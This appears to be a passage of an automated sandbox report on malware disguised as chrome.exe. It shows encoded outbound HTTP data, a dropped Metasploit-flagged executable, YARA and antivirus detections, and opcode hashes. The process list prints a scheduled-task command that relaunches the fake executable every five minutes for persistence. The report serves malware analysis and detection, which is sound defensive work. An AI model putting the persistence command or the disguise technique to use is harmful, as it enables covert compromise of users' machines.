                Data Ascii: Name=screen&dataFile=F8%2fd%2fH5JXeZMAkL0t02ZP9nVsz1YeH4qDR82TtRkcPS3A17i%2bD%2beW8jcCw6IhZeNxNXbLBuckFSTLXcT0TBTELYT249rzoZccVvKn3BKa84Bl0yNZZKK%2fQgIEGLedQypBDeGREnjjvcQbVDqHwI0PUvDqIl6p9YxSYhAW8GjzftgCWUCtaPMqPnB1KZrrLkLdbaUyC94jbjy0dh1ascf
                Jul 11, 2023 15:47:22.519557953 CEST | 151 | OUT | Data Raw: 4c 54 34 55 64 76 66 32 37 62 62 6c 33 30 32 59 62 56 5a 63 36 62 71 43 4d 37 58 4a 5a 4a 49 49 5a 47 74 4a 41 59 37 35 70 5a 76 77 4d 41 50 5a 35 77 69 41 79 41 36 69 35 57 56 4b 64 65 34 43 6d 44 49 4a 32 47 59 78 61 53 4e 44 41 4a 6d 79 4c 52
                Data Ascii: LT4Udvf27bbl302YbVZc6bqCM7XJZJIIZGtJAY75pZvwMAPZ5wiAyA6i5WVKde4CmDIJ2GYxaSNDAJmyLRkNFb3rWfjkw4%2fnz8OLgSb2UAbf8uTI7TMQP2ZKGVIci2bfjNvdbplHewlSE07D%2b2QKARgR4yN1je%2fGPccDtS36peB3b6M10IysMlN4h7yK0U2ESckf5ZMPiLXXkQo9%2f4WNA3Ft6GwNJaSSYO5uWzJcGSj
                Jul 11, 2023 15:47:22.519619942 CEST | 154 | OUT | Data Raw: 49 49 6c 31 46 63 55 48 6c 6e 44 57 57 77 4f 68 75 25 32 66 4b 63 61 4b 57 50 77 4b 33 52 47 52 78 55 78 72 6b 69 61 71 71 35 79 30 58 6b 54 44 4f 4b 4e 46 4a 71 51 65 67 4e 39 49 36 57 33 54 56 31 5a 41 36 5a 4a 4b 57 46 73 77 63 54 4c 64 62 76
                Data Ascii: IIl1FcUHlnDWWwOhu%2fKcaKWPwK3RGRxUxrkiaqq5y0XkTDOKNFJqQegN9I6W3TV1ZA6ZJKWFswcTLdbvfJR8IOrJeuez%2bPhD%2f803YP5s0zVtDIg3fFK3sVLo8yFOlzDDNB80YZAqRn2mo2N3WHGxKPg%2f7Kah6Sy20X9%2bgMJ6b%2f%2f2yjyKZs6sOVu9kfHPf2kmyoT4HeQo4U06l1GBO7HaIneJBbmTeFjqnv8IQ
                Jul 11, 2023 15:47:22.690756083 CEST | 164 | OUT | Data Raw: 72 62 77 68 46 76 5a 36 48 58 72 51 46 25 32 66 7a 56 67 4d 4c 30 30 44 36 31 6a 65 62 72 77 63 54 6e 6e 54 32 69 39 4d 46 56 78 35 39 77 63 54 78 4b 33 64 66 64 4c 25 32 66 4c 6b 62 51 31 38 37 66 73 6c 7a 39 52 57 65 62 78 41 62 68 4f 70 77 68
                Data Ascii: rbwhFvZ6HXrQF%2fzVgML00D61jebrwcTnnT2i9MFVx59wcTxK3dfdL%2fLkbQ187fslz9RWebxAbhOpwhCMKGrK7HHvvxDIW3A3q1dT8KxNYvf6DlnUCRCgl4dLR3srnTZJm6IMKog%2bj61QkjdnHQh%2fa52Qw8Z72tELN8SdiF6wogXS6MlAhFvYkxpnd%2bI%2bsiC%2fYZdbt1OQqD4DE9k%2fvUC6m%2bKQwCczCmYRL
                Jul 11, 2023 15:47:22.690809011 CEST | 169 | OUT | Data Raw: 74 57 66 73 64 73 42 46 36 36 4a 78 25 32 66 30 6e 4c 53 34 70 6d 25 32 66 52 68 41 68 79 78 5a 53 42 51 55 78 32 53 25 32 66 6c 7a 53 69 51 53 7a 31 4f 64 76 4e 30 52 38 69 56 57 38 31 62 57 46 62 30 72 36 31 47 4c 51 34 61 5a 4b 78 43 41 4b 76
                Data Ascii: tWfsdsBF66Jx%2f0nLS4pm%2fRhAhyxZSBQUx2S%2flzSiQSz1OdvN0R8iVW81bWFb0r61GLQ4aZKxCAKvHu3iwAix6K78AdqC%2fMM9OSl43nkZIx5BeGXSnRjLfY6vOKgxIqp8%2bbGdnWgGNW52Gr%2bg92r%2fvMx2ocOCn1p%2bmEGqiX2uDBxRPQHDlivQLMmDK0p7gNKEyXB1EGnKjwCMsCB%2fC%2bGA69XYvKvzlUz
                Jul 11, 2023 15:47:22.690809011 CEST | 174 | OUT | Data Raw: 4d 34 58 38 25 32 66 59 64 39 73 4b 43 4d 52 6d 5a 50 78 54 47 79 74 74 4f 25 32 66 6a 34 6d 50 56 39 74 25 32 62 6f 73 4a 78 30 51 77 43 79 34 6a 51 56 36 71 56 68 4c 69 69 4a 6b 42 39 79 59 52 71 58 56 41 46 39 4b 6f 63 58 55 57 6b 6d 36 78 68
                Data Ascii: M4X8%2fYd9sKCMRmZPxTGyttO%2fj4mPV9t%2bosJx0QwCy4jQV6qVhLiiJkB9yYRqXVAF9KocXUWkm6xh%2fYe3WwpF1i1Lk5FfcgD%2byUonuNxWYnqcWDA3h%2bCIG0u7IBeqt4f6luG9%2bIAYR4jN%2b%2fLCZh1le3CAT5ahRcnsLQAzhYXdUeCHntXeixbigRWYEFFiihW0xDGgs96ag%2fKVMklc2pfxHfPqUgxwzGD
                Jul 11, 2023 15:47:22.861896038 CEST | 177 | OUT | Data Raw: 68 69 6c 58 32 49 4a 51 30 68 75 70 5a 71 35 6c 44 25 32 62 25 32 66 57 25 32 66 6f 6b 57 50 6c 25 32 66 6c 6f 56 4e 42 65 38 4e 73 39 25 32 66 54 77 39 4b 53 38 57 46 4d 62 48 50 44 34 78 71 49 42 57 6d 73 4e 76 30 47 33 53 55 7a 67 70 45 67 74
                Data Ascii: hilX2IJQ0hupZq5lD%2b%2fW%2fokWPl%2floVNBe8Ns9%2fTw9KS8WFMbHPD4xqIBWmsNv0G3SUzgpEgtbQ0S5n7hqd3h4zPk7nnhIL79YPxNckzNKnGs5rV%2fTFxMNFjByMxgW6O7zkV%2fWFcDX2GfVINFBvcnmGJYOspZN14G0sa1nZNghxbCV2E6NTCwwBcCL34QOgPqnYRrvjnyo2qNvWvhzigLaHybAFfls8BOsnhyt
                Jul 11, 2023 15:47:22.861996889 CEST | 190 | OUT | Data Raw: 67 33 58 44 77 66 4c 74 68 75 4a 31 6b 4a 70 66 6b 31 67 30 52 70 44 6f 30 35 35 59 7a 73 59 67 55 69 25 32 66 4e 6b 7a 54 32 43 65 46 78 64 37 6e 66 61 32 32 33 64 78 7a 48 72 41 49 37 46 52 74 6a 25 32 66 4e 6d 74 32 61 61 49 45 75 6e 54 46 43
                Data Ascii: g3XDwfLthuJ1kJpfk1g0RpDo055YzsYgUi%2fNkzT2CeFxd7nfa223dxzHrAI7FRtj%2fNmt2aaIEunTFCIosGBg%2bBbUEUQgZ3NtRv38%2bh7KHx%2bPUORgUqS%2fPmOYy8AGeWl%2bhc8expVpMOgxMk%2bgzZDd4HchrZ43wYKHbhDUoBZtHJM8FO3r%2fdL93FN5JyD9wA2V%2fgKcQlhkq2vRXo2wD8yM7lvTI3UvV%2
                Jul 11, 2023 15:47:22.862067938 CEST | 212 | OUT | Data Raw: 6b 4c 43 52 39 41 66 53 52 4d 36 30 78 64 56 6b 73 59 49 78 37 6c 4e 61 6a 38 33 25 32 62 7a 4e 56 42 54 4c 6a 4a 43 56 6f 6f 25 32 62 65 78 59 56 6b 72 6e 48 63 66 67 58 35 45 79 34 4d 71 65 79 67 69 38 75 63 25 32 62 54 6b 61 4f 70 56 4f 7a 77
                Data Ascii: kLCR9AfSRM60xdVksYIx7lNaj83%2bzNVBTLjJCVoo%2bexYVkrnHcfgX5Ey4Mqeygi8uc%2bTkaOpVOzwIE19Q3WuZk%2bcfcUN%2fPgxrkDynhMlWr8RyFN2b9%2ffZdx7QQNte1mZFZYIiXeZ49BUecTaaVN4wHymJXA75%2bG%2bSCwMfWKSqxXtyTf217uu23x6ASfGQvhCUPlHMV11c61VPAsgbwgpC0Q4ECZfMR3B7mx
                Jul 11, 2023 15:47:22.903913021 CEST | 215 | OUT | Data Raw: 66 50 41 68 35 32 39 44 5a 36 72 56 6c 78 71 50 44 69 75 44 65 70 79 78 6e 61 62 76 70 79 47 59 35 48 33 76 36 6c 52 38 4c 33 71 32 39 31 71 49 33 4d 41 70 56 52 77 79 6a 63 47 56 45 73 6d 65 74 32 35 6a 49 48 6f 50 6d 4c 32 35 68 70 79 34 33 76
                Data Ascii: fPAh529DZ6rVlxqPDiuDepyxnabvpyGY5H3v6lR8L3q291qI3MApVRwyjcGVEsmet25jIHoPmL25hpy43vhZHL%2fAh2KVyt%2bECjHTDPOOBTMFxWh6hpH1UvyNALYJgiwE3nTFaZvF2%2bfXiKbPsG9xynshI1W9d5h7PZeBl1ZlebtU1xxFntUQ0Lgocu6zKxlY9RMYKzXfDxZ4Tm1PhOP0N%2fm5qFjBNpPU5hsG9Nwl4rF
                Jul 11, 2023 15:47:23.434360981 CEST | 259 | IN | HTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:22 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8


                Target ID:0
                Start time:15:47:08
                Start date:11/07/2023
                Path:C:\Users\user\Desktop\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\chrome.exe
                Imagebase:0x271552d0000
                File size:1'142'288 bytes
                MD5 hash:B2EAF44F5D0EA664E504C9C8C6C42D23
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                Target ID:2
                Start time:15:47:12
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"schtasks.exe" /query /TN WinTask
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:15:47:12
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:4
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:5
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:6
                Start time:15:47:13
                Start date:11/07/2023
                Path:C:\Users\user\Desktop\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\chrome.exe
                Imagebase:0x1f074240000
                File size:1'142'288 bytes
                MD5 hash:B2EAF44F5D0EA664E504C9C8C6C42D23
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Target ID:7
                Start time:15:47:16
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"schtasks.exe" /query /TN WinTask
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:8
                Start time:15:47:16
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                Target ID:9
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
                Imagebase:0x7ff6f0670000
                File size:226'816 bytes
                MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                Target ID:10
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe"
                Imagebase:0x140000000
                File size:7'168 bytes
                MD5 hash:468F9575A65D99F52FA2B52C505F59A6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Author: unknown
                • Rule: JoeSecurity_MetasploitPayload_2, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: Joe Security
                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                • Rule: Windows_Trojan_Metasploit_91bc5d7d, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, Author: unknown
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML

                Target ID:11
                Start time:15:47:17
                Start date:11/07/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625'664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 227d7a536a950328269e7d78bd2f747bbec1f69ba9914c52e70b6c17b47a7407
                  • Instruction ID: 2ae9c66a31c1eddb75784f363ab298872e1ea4bd25bb56a5776badb99a369810
                  • Opcode Fuzzy Hash: 227d7a536a950328269e7d78bd2f747bbec1f69ba9914c52e70b6c17b47a7407
                  • Instruction Fuzzy Hash: B2D15F21B3CA860BF31DAA28984A2F577D1EF563A6F2442BDD4CBC75C7DD286C424351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 783d665c5daafd9c319bf477522757da4f2779e855c38933d2c892da1d3bc272
                  • Instruction ID: 4a646b2674d94388969a069b870c72ce718ecd08afe73d48e48ad2db7e5d8930
                  • Opcode Fuzzy Hash: 783d665c5daafd9c319bf477522757da4f2779e855c38933d2c892da1d3bc272
                  • Instruction Fuzzy Hash: 0DC16E21B3C94A0BF31DAA2C984A2F576C2EF957A6F6442BDD4CBC76C7DD286C424241
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: 92a97ae303334e4ec7b339c0f068aa42c981be781b7dcef452c0797d95376971
                  • Instruction ID: faf9cfbc68b30417689c1ba70e95af20920d01f95731987b308d788292e40c62
                  • Opcode Fuzzy Hash: 92a97ae303334e4ec7b339c0f068aa42c981be781b7dcef452c0797d95376971
                  • Instruction Fuzzy Hash: 4871FA22F1CD494FF798F62C94597B877C2EFA93A1B1401BAD48EC7297DD28AC824351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: ded2214498e54ce8a0c03128bab6b3cba08e912c8fb288141dae8e8a5eb6e7e7
                  • Instruction ID: 539dac06b72c6088a5a85dd49dd885b17e8a9d9c2f33b37d6fff647a54d48231
                  • Opcode Fuzzy Hash: ded2214498e54ce8a0c03128bab6b3cba08e912c8fb288141dae8e8a5eb6e7e7
                  • Instruction Fuzzy Hash: 1E61F922B1CD494FE798FB2C94597B877C1EF993A1B1402BAD44EC7297DD28AC828351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d541664adc25e46902c74448926f8c691ff0018ded17cda32e737c30650b3db0
                  • Instruction ID: 4e3123c057c25728b533a63d2cf04b3f1374ea6abebbaee4899c4116ff61d51e
                  • Opcode Fuzzy Hash: d541664adc25e46902c74448926f8c691ff0018ded17cda32e737c30650b3db0
                  • Instruction Fuzzy Hash: 64623E71E18A4D4FEB98EB28C851BF977A1EF59390F4001B5D44EDB692CD287C84CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dd9eca1d8abfe04b6de386c75bed3d411d42e16de8dc9ce4f49f0e61778d28d
                  • Instruction ID: 76ff779bb53d6c3e46e856d3fd0b1b1f0300c0448c1619af722a48c79265f1e5
                  • Opcode Fuzzy Hash: 4dd9eca1d8abfe04b6de386c75bed3d411d42e16de8dc9ce4f49f0e61778d28d
                  • Instruction Fuzzy Hash: 5A41C422B1DA890FEB56E73C98652F97BA1EF873A1B0801F7D489CB1E3CD185C458352
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 72678211359a30343e81e493082c7b10e7a57b371dd15cb8aa2ffca56e26b21c
                  • Instruction ID: 63ab2db289f36cf0f8c5bec567869bd5450c6e1cd1362263e05cecac5e0d358d
                  • Opcode Fuzzy Hash: 72678211359a30343e81e493082c7b10e7a57b371dd15cb8aa2ffca56e26b21c
                  • Instruction Fuzzy Hash: AB710421A1CD890FE796E72C44187B57BD1EF9A3A2B1501FAE08EC7293DD186C45C353
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8c7315e4daa7c9a659f5a8ea95e6d82aa5803984569db35d18774967fd8a9ffa
                  • Instruction ID: 1cffd6444948c13c7263570bd58ca3ab7f932c212f03b88f12bf793a99118901
                  • Opcode Fuzzy Hash: 8c7315e4daa7c9a659f5a8ea95e6d82aa5803984569db35d18774967fd8a9ffa
                  • Instruction Fuzzy Hash: 1F710631D18A498FDB54EB68C8556E8BBF1FF49360F1402BAD44DDB282CE386C42CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e52b711c303e86809c390f607ce537fdc0786fe19ea759358e49cc1763ee8bc4
                  • Instruction ID: 38e15de196d617992f8b0e3a3b9705121681268e26f624e374362f9d4e30e0f2
                  • Opcode Fuzzy Hash: e52b711c303e86809c390f607ce537fdc0786fe19ea759358e49cc1763ee8bc4
                  • Instruction Fuzzy Hash: C9510712B2CE450FE758B73C846A3F9A6C2EF993E1B5401BAD44EC76D3DC286C814342
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8313e351afa0d75fb56aec46eb01d75ca0c3fce46c503ea4c46eb29e660ba549
                  • Instruction ID: 5e818209494ce83b9677d32f87af09409197eabe418f5c001fc157e64247537f
                  • Opcode Fuzzy Hash: 8313e351afa0d75fb56aec46eb01d75ca0c3fce46c503ea4c46eb29e660ba549
                  • Instruction Fuzzy Hash: 1D51C412B2CE050FF74CB62C945A7B9B6C2DF597E1F5041BAE44EC76D3DC286C844262
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e42ccc3141e0390a9a1c735e1b56cb41793cef5f864d4d406c463c66ad348743
                  • Instruction ID: f334a23e67e05cc679fa5880dbb9b44e587df80ec4eef425d198929ec0b23319
                  • Opcode Fuzzy Hash: e42ccc3141e0390a9a1c735e1b56cb41793cef5f864d4d406c463c66ad348743
                  • Instruction Fuzzy Hash: 2E51D630A1DA8A4FDB55D73884187F9BBE1BF55361F1402BAD08ED72D3CE2C68458792
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e878545bf4caaea6425974c5435a7cee45b3da30c308a481ff6cf7bf5e6c8205
                  • Instruction ID: 3eb555bf9b1f2ef8279a00aafa40adf6a22f38349b3bc164fd4ebbc851acd57a
                  • Opcode Fuzzy Hash: e878545bf4caaea6425974c5435a7cee45b3da30c308a481ff6cf7bf5e6c8205
                  • Instruction Fuzzy Hash: FE415121E1DE460EFAA5AB2448217FC26919F963E0F5102B6D48FCB2D3DD2D3C48C756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 654a58579bc12325fd8659d960f249a5122da40ef217ecfe739ad32d3eb9fd0e
                  • Instruction ID: 2834eeca1dc6a286281b033242e54f0fb24037bd64941d95effa6bacd8e9f328
                  • Opcode Fuzzy Hash: 654a58579bc12325fd8659d960f249a5122da40ef217ecfe739ad32d3eb9fd0e
                  • Instruction Fuzzy Hash: FC114C22D0DA8A0FE381E77848596F57BE1EF9B3A070941FAE04DC7193DD2C9C468712
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4b0de8b275f4c2114f7d85e6f03fe820f187b9e0ac60a59f7c31d8d1b204772
                  • Instruction ID: cd439413ed60f51664f9616f5cb6177ef8ff067a05f7d3f0826acd889bcbc91b
                  • Opcode Fuzzy Hash: c4b0de8b275f4c2114f7d85e6f03fe820f187b9e0ac60a59f7c31d8d1b204772
                  • Instruction Fuzzy Hash: 44E02230C08B4D8FCB50EE98E408AE9BBA4FB8936AF1801AAD00DC20A2C2321884C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bbc3625ba139b01b62b03a0475d1f2e11083ee7b34b5cf1fb6e2fed1874ff31
                  • Instruction ID: a7343a6e16a09736ab4a3dc06624b22afef8972bca2c14dcfa50fc7d7ea41128
                  • Opcode Fuzzy Hash: 2bbc3625ba139b01b62b03a0475d1f2e11083ee7b34b5cf1fb6e2fed1874ff31
                  • Instruction Fuzzy Hash: F1D05E23B19C194ADB62A65CF0017FEF3C1DB883A5F0846BBD20EC3581CE65648647C1
                  Uniqueness

                  Uniqueness Score: -1.00%
